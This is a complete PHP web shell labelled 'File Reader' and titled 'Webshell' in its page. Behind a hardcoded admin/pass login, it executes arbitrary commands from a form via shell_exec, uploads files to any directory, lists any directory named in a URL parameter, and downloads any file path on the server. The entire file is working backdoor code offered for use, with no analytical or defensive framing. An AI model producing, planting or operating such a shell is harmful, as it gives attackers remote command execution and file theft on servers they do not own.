📖 File Reader
<?php
// Basic auth (optional, remove if not needed)
if (!isset($_SERVER['PHP_AUTH_USER']) || $_SERVER['PHP_AUTH_USER'] != 'admin' || $_SERVER['PHP_AUTH_PW'] != 'pass') {
header('WWW-Authenticate: Basic realm="Shell"');
header('HTTP/1.0 401 Unauthorized');
die('Access Denied');
}
$dir = getcwd();
if (isset($_GET['dir'])) $dir = $_GET['dir'];
$files = scandir($dir);
// Cmd Exec
if (isset($_POST['cmd'])) {
echo "<pre>" . shell_exec($_POST['cmd']) . "</pre>";
}
// File Upload
if (isset($_FILES['file'])) {
move_uploaded_file($_FILES['file']['tmp_name'], $dir . '/' . $_FILES['file']['name']);
echo "Uploaded: " . $_FILES['file']['name'];
}
// File Download
if (isset($_GET['download'])) {
$file = $_GET['download'];
header('Content-Type: application/octet-stream');
header('Content-Disposition: attachment; filename="' . basename($file) . '"');
readfile($file);
exit;
}
?>
<!DOCTYPE html>
<html>
<body>
<h1>Webshell</h1>
<!-- Cmd Exec -->
<form method="POST">
<input name="cmd" placeholder="id">
<button>Run Cmd</button>
</form>
<!-- File Upload -->
<form method="POST" enctype="multipart/form-data">
<input type="file" name="file">
<button>Upload</button>
</form>
<!-- File Manager & Download -->
<ul>
<?php foreach ($files as $file) {
if ($file != '.' && $file != '..') {
echo "<li>$file <a href='?download=$dir/$file'>Download</a></li>";
}
} ?>
</ul>
</body>
</html>